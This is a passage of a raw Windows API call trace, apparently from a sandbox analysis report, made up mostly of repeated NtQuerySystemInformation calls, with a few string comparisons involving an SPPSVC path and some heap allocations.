ResultLength=0x0) [0214.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5f0, Length=0x28, ResultLength=0x0) [0214.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5f0, Length=0x28, ResultLength=0x0) [0214.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5f0, Length=0x28, ResultLength=0x0) [0214.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd660, Length=0x28, ResultLength=0x0) [0214.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x38, ResultLength=0x0) [0214.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x28, ResultLength=0x0) [0214.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x28, ResultLength=0x0) [0214.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x38, ResultLength=0x0) [0214.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x20, ResultLength=0x0) [0214.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x20, ResultLength=0x0) [0214.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x20, ResultLength=0x0) [0214.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x20, ResultLength=0x0) [0214.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x38, ResultLength=0x0) [0214.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x20, ResultLength=0x0) [0214.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x20, ResultLength=0x0) [0214.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x20, ResultLength=0x0) [0214.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9a0, Length=0x50, ResultLength=0x0) [0214.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9a0, Length=0x50, ResultLength=0x0) [0214.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9a0, Length=0x50, ResultLength=0x0) [0214.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd890, Length=0x50, ResultLength=0x0) [0214.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd890, Length=0x50, ResultLength=0x0) [0214.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd890, Length=0x50, ResultLength=0x0) [0214.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd890, Length=0x50, ResultLength=0x0) [0214.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x38, ResultLength=0x0) [0214.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5f0, Length=0x28, ResultLength=0x0) [0214.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5f0, Length=0x28, ResultLength=0x0) [0214.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5f0, Length=0x28, ResultLength=0x0) [0214.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd660, Length=0x28, ResultLength=0x0) [0214.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x38, ResultLength=0x0) [0214.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x28, ResultLength=0x0) [0214.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x28, ResultLength=0x0) [0214.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x38, ResultLength=0x0) [0214.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x20, ResultLength=0x0) [0214.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x20, ResultLength=0x0) [0214.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x20, ResultLength=0x0) [0214.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x20, ResultLength=0x0) [0214.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.681] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x38, ResultLength=0x0) [0214.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x20, ResultLength=0x0) [0214.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x20, ResultLength=0x0) [0214.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x20, ResultLength=0x0) [0214.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x50, ResultLength=0x0) [0214.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9d0, Length=0x28, ResultLength=0x0) [0214.683] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0214.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x50, ResultLength=0x0) [0214.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x50, ResultLength=0x0) [0214.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x50, ResultLength=0x0) [0214.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0214.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x28, ResultLength=0x0) [0214.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x28, ResultLength=0x0) [0214.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x28, ResultLength=0x0) [0214.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd820, Length=0x28, ResultLength=0x0) [0214.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0214.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a0, Length=0x28, ResultLength=0x0) [0214.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a0, Length=0x28, ResultLength=0x0) [0214.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0214.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0214.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x20, ResultLength=0x0) [0214.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x20, ResultLength=0x0) [0214.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x20, ResultLength=0x0) [0214.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0214.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0214.694] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x20, ResultLength=0x0) [0214.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x20, ResultLength=0x0) [0214.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x50, ResultLength=0x0) [0214.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9d0, Length=0x28, ResultLength=0x0) [0214.696] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0214.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x50, ResultLength=0x0) [0214.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x50, ResultLength=0x0) [0214.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x50, ResultLength=0x0) [0214.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0214.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x28, ResultLength=0x0) [0214.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x28, ResultLength=0x0) [0214.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x28, ResultLength=0x0) [0214.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd820, Length=0x28, ResultLength=0x0) [0214.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0214.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a0, Length=0x28, ResultLength=0x0) [0214.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a0, Length=0x28, ResultLength=0x0) [0214.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0214.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0214.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x20, ResultLength=0x0) [0214.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x20, ResultLength=0x0) [0214.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x20, ResultLength=0x0) [0214.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0214.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0214.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x20, ResultLength=0x0) [0214.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x20, ResultLength=0x0) [0214.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0214.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0215.258] GetProcessHeap () returned 0x27fc8db0000 [0215.258] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbdbb0 [0215.258] GetProcessHeap () returned 